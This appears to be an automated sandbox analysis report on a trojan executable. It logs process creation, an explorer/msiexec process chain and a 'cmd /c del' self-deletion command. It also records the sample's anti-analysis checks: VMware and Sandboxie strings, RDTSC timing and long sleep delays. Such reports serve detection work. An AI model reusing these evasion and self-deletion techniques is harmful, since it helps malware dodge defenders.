        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329670 NtQueryInformationProcess,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01329650 NtQueryValueKey,
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013296D0 NtCreateKey,
        Source: 0098764345678.exe, 00000000.00000003.278591003.0000000002CD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs 0098764345678.exe
        Source: 0098764345678.exe, 00000000.00000002.296657611.0000000002681000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs 0098764345678.exe
        Source: 0098764345678.exe, 00000000.00000002.304635957.0000000003838000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs 0098764345678.exe
        Source: 0098764345678.exe, 00000000.00000002.311137513.00000000070F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs 0098764345678.exe
        Source: 0098764345678.exe, 00000000.00000000.259391236.00000000003A9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameeSjJ.exe6 vs 0098764345678.exe
        Source: 0098764345678.exe, 00000004.00000003.296880830.0000000001248000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 0098764345678.exe
        Source: 0098764345678.exe, 00000004.00000003.288906894.000000000109B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 0098764345678.exe
        Source: 0098764345678.exe, 00000004.00000002.406996064.00000000013DF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 0098764345678.exe
        Source: 0098764345678.exeBinary or memory string: OriginalFilenameeSjJ.exe6 vs 0098764345678.exe
        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
        Source: 0098764345678.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: 0098764345678.exeReversingLabs: Detection: 29%
        Source: 0098764345678.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\0098764345678.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\0098764345678.exe "C:\Users\user\Desktop\0098764345678.exe"
        Source: C:\Users\user\Desktop\0098764345678.exeProcess created: C:\Users\user\Desktop\0098764345678.exe {path}
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\0098764345678.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\0098764345678.exeProcess created: C:\Users\user\Desktop\0098764345678.exe {path}
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\0098764345678.exe"
        Source: C:\Users\user\Desktop\0098764345678.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0098764345678.exe.logJump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@4/3
        Source: 0098764345678.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
        Source: C:\Users\user\Desktop\0098764345678.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2616:120:WilError_01
        Source: C:\Users\user\Desktop\0098764345678.exeMutant created: \Sessions\1\BaseNamedObjects\qwxyLctBReTaJUexo
        Source: 0098764345678.exeString found in binary or memory: Address:/AddressToolStripTextBox-AddressToolStripButton'ToolStripSeparator3'PhoneToolStripLabel
        Source: 0098764345678.exeString found in binary or memory: Address:/AddressToolStripTextBox-AddressToolStripButton'ToolStripSeparator3'PhoneToolStripLabel
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\0098764345678.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: 0098764345678.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: 0098764345678.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdbUGP source: 0098764345678.exe, 00000004.00000003.296024100.0000000001129000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000004.00000002.405035739.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.540716207.000000000481F000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.404501022.0000000000F9F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.406891503.0000000004567000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.537834669.0000000004700000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: 0098764345678.exe, 0098764345678.exe, 00000004.00000003.296024100.0000000001129000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000004.00000002.405035739.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.540716207.000000000481F000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.404501022.0000000000F9F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.406891503.0000000004567000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.537834669.0000000004700000.00000040.00000800.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: 0098764345678.exe, AddCompanyForm.cs.Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
        Source: 0.0.0098764345678.exe.2e0000.0.unpack, AddCompanyForm.cs.Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_046D30C5 push FFFFFF8Bh; iretd
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_04C00428 pushad ; ret
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 0_2_04C0B303 push A000005Eh; iretd
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0133D0D1 push ecx; ret
        Source: initial sampleStatic PE information: section name: .text entropy: 7.755433575033054
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: Yara matchFile source: Process Memory Space: 0098764345678.exe PID: 5832, type: MEMORYSTR
        Source: 0098764345678.exe, 00000000.00000002.301264295.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000002.296657611.0000000002681000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: 0098764345678.exe, 00000000.00000002.301264295.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000002.296657611.0000000002681000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
        Source: C:\Users\user\Desktop\0098764345678.exeRDTSC instruction interceptor: First address: 0000000000408C34 second address: 0000000000408C3A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\0098764345678.exeRDTSC instruction interceptor: First address: 0000000000408FCE second address: 0000000000408FD4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\0098764345678.exe TID: 5256Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B5BA5 rdtsc
        Source: C:\Users\user\Desktop\0098764345678.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\0098764345678.exeAPI coverage: 3.8 %
        Source: C:\Users\user\Desktop\0098764345678.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\0098764345678.exeThread delayed: delay time: 922337203685477
        Source: explorer.exe, 00000007.00000000.385371809.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
        Source: explorer.exe, 00000007.00000000.361138480.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
        Source: explorer.exe, 00000007.00000000.372820502.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
        Source: 0098764345678.exe, 00000000.00000002.296657611.0000000002681000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
        Source: explorer.exe, 00000007.00000000.372900510.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: 0098764345678.exe, 00000000.00000002.296657611.0000000002681000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
        Source: explorer.exe, 00000007.00000000.361138480.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
        Source: 0098764345678.exe, 00000000.00000002.296657611.0000000002681000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: explorer.exe, 00000007.00000000.361138480.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
        Source: 0098764345678.exe, 00000000.00000002.296657611.0000000002681000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: explorer.exe, 00000007.00000000.315937112.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000007.00000000.361138480.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
        Source: explorer.exe, 00000007.00000000.446684667.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
        Source: 0098764345678.exe, 00000000.00000002.296657611.0000000002681000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
        Source: explorer.exe, 00000007.00000000.385647400.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
        Source: 0098764345678.exe, 00000000.00000002.296657611.0000000002681000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: 0098764345678.exe, 00000000.00000002.296657611.0000000002681000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: 0098764345678.exe, 00000000.00000002.296657611.0000000002681000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
        Source: 0098764345678.exe, 00000000.00000002.296657611.0000000002681000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
        Source: explorer.exe, 00000007.00000000.385371809.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
        Source: explorer.exe, 00000007.00000000.361138480.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B5BA5 rdtsc
        Source: C:\Users\user\Desktop\0098764345678.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\0098764345678.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01304120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01304120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01304120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01304120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01304120 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E9100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E9100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E9100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EC962 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EB171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EB171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013651BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013651BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013651BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013651BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013099BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013099BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013099BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013099BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013099BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013099BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013099BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013099BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013099BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013099BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013099BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013099BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013669A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013161A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013161A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A49A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A49A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A49A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A49A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01312990 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130C182 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131A185 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EB1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EB1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012EB1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013741E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A830 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A830 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A830 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130A830 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012FB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012FB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012FB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012FB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01367016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01367016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01367016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B4015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B4015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013A2073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013B1074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01300050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01300050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131F0BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0131F0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013120A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013120A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013120A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013120A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013120A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013120A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_013290AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E9080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01363884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_01363884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E58EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E40E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E40E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_012E40E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B8E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0130B8E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0137B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0137B8D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4_2_0137B8D0 mov eax, dword ptr fs:[00000030h]
